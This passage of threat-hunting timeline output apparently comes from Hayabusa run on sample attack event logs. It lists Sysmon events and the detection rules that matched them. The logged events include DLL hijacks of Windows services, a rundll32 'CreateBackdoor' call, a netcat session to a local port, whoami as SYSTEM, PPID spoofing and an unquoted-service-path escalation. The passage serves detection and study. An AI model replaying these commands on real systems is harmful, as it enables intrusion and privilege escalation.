| Signed: false | Signature: Unavailable | PID: 3536 | PGUID: 747F3D96-9F69-5E75-0000-0010729F2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: nc.exe 127.0.0.1 1337 | Process: C:\Users\Public\Tools\nc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2935f | PID: 3364 | PGUID: 747F3D96-9F77-5E75-0000-0010D2E62000 | Hash: SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:39.441 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | LID: 0x3e7 | PID: 2416 | PGUID: 747F3D96-9F77-5E75-0000-001090F32000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:40.502 
+09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49674 (MSEDGEWIN10) | Dst: 127.0.0.1:1337 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\rundll32.exe | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 2484 | PGUID: 747F3D96-9F7D-5E75-0000-00104E062100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:54.689 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4680 
| PGUID: 747F3D96-9F86-5E75-0000-00101A9F2100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc stop CDPSvc | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 4876 | PGUID: 747F3D96-0A17-5E76-0000-001062373A00 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,low,Impact,Stop Windows Service,,../hayabusa-rules/sigma/process_creation/proc_creation_win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:43.104 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc query CDPSvc | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 1236 | PGUID: 747F3D96-0A1F-5E76-0000-0010375C3A00 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:52.013 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program 
Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications | Process: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | LID: 0x2de87 | PID: 3808 | PGUID: 747F3D96-0A28-5E76-0000-0010882B3C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net start CDPSvc | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 7072 | PGUID: 747F3D96-0A2B-5E76-0000-0010C02A3D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Exec,Service Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\net1 start CDPSvc | Process: C:\Windows\System32\net1.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: net start CDPSvc | LID: 0x2de43 | PID: 7664 | PGUID: 747F3D96-0A2B-5E76-0000-0010A92C3D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 
dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Exec,Service Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.919 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3896 | PGUID: 747F3D96-0A2B-5E76-0000-00101E2F3D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:56.078 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - CDPSvc | Image: C:\ProgramData\chocolatey\bin\cdpsgshims.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 3896 | PGUID: 747F3D96-0A2B-5E76-0000-00101E2F3D00 | Hash: SHA1=B3314F0EEBBB88A8AC5CF790A706B65F962A3722,MD5=3C0D53F2A6341F6D793B1EB114E6FBF6,SHA256=CCCE37A8276ACE489A237A31181DF7E2B6F58D576C2410DE0A9C21F9F9937D12,IMPHASH=FE8C6819894B9677BB9D9642B2550AC9",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.899 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\Tools\nc.exe | PID: 4464 | PGUID: 747F3D96-08DA-5E76-0000-001012352E00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 3696 | PGUID: 747F3D96-0A33-5E76-0000-0010B8813D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: nc.exe 127.0.0.1 1337 | Process: C:\Users\Public\Tools\nc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de87 | PID: 488 | PGUID: 747F3D96-0A36-5E76-0000-0010C8923D00 | Hash: SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:07.872 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\Tools\nc.exe | PID: 488 | PGUID: 747F3D96-0A36-5E76-0000-0010C8923D00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:24.316 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2560 | PGUID: 747F3D96-0A48-5E76-0000-001051C83E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:38.828 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: 
C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe | PID: 2744 | PGUID: 747F3D96-0880-5E76-0000-001014202B00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-22 06:45:04.908 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f3fff | Src PID: 8004 | Src PGUID: 747F3D96-26FD-5E76-0000-00100A320D01 | Tgt PID: 4668 | Tgt PGUID: 747F3D96-06AA-5E76-0000-001046E10400,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-22 06:45:04.922 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x2de87 | PID: 7708 | PGUID: 747F3D96-8AE0-5E76-0000-0010933B8003",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-22 06:45:04.923 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 8004 | Src PGUID: 747F3D96-26FD-5E76-0000-00100A320D01 | Tgt PID: 7708 | Tgt PGUID: 747F3D96-8AE0-5E76-0000-0010933B8003,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-22 06:45:16.576 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT 
AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 404 | PGUID: 747F3D96-8AEC-5E76-0000-00101DDB8003,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-22 06:45:16.765 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4792 | PGUID: 747F3D96-8AEC-5E76-0000-0010AAE38003,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-04-26 07:18:47.143 +09:00,MSEDGEWIN10,11,high,Persis,Creation Exe for Service with Unquoted Path,,../hayabusa-rules/sigma/file_event/win_fe_creation_unquoted_service_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:18:47.143 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - Potential PrivEsc via unquoted Service | Path: C:\program.exe | Process: C:\Windows\system32\cmd.exe | PID: 5712 | PGUID: 747F3D96-B521-5EA4-0000-00108C171300,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:00.308 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? 
| LID: 0x3e7 | PID: 6244 | PGUID: 747F3D96-B754-5EA4-0000-00104F0A2500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 4484 | PGUID: 747F3D96-B755-5EA4-0000-0010D06E2500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:20.134 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? 
| LID: 0x3e7 | PID: 300 | PGUID: 747F3D96-B75F-5EA4-0000-0010622C0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:22.312 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \??\C:\Windows\system32\autochk.exe * | Process: C:\Windows\System32\autochk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 328 | PGUID: 747F3D96-B762-5EA4-0000-00108B3C0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:22.596 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 388 | PGUID: 747F3D96-B763-5EA4-0000-00106A480000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:22.630 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | LID: 0x3e7 | PID: 396 | PGUID: 747F3D96-B763-5EA4-0000-001034490000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.220 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | Process: 
C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 460 | PGUID: 747F3D96-B764-5EA4-0000-0010794D0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.222 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | LID: 0x3e7 | PID: 468 | PGUID: 747F3D96-B764-5EA4-0000-0010904D0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.224 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | LID: 0x3e7 | PID: 476 | PGUID: 747F3D96-B764-5EA4-0000-0010714E0000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.876 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | LID: 0x3e7 | PID: 568 | PGUID: 747F3D96-B764-5EA4-0000-001096530000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.049 +09:00,MSEDGEWIN10,1,info,,Process 
Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 584 | PGUID: 747F3D96-B764-5EA4-0000-00106F550000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.054 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 616 | PGUID: 747F3D96-B764-5EA4-0000-001075590000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.188 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 732 | PGUID: 747F3D96-B764-5EA4-0000-00105B6C0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.194 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 808 | PGUID: 747F3D96-B764-5EA4-0000-0010FE6F0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.198 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: 
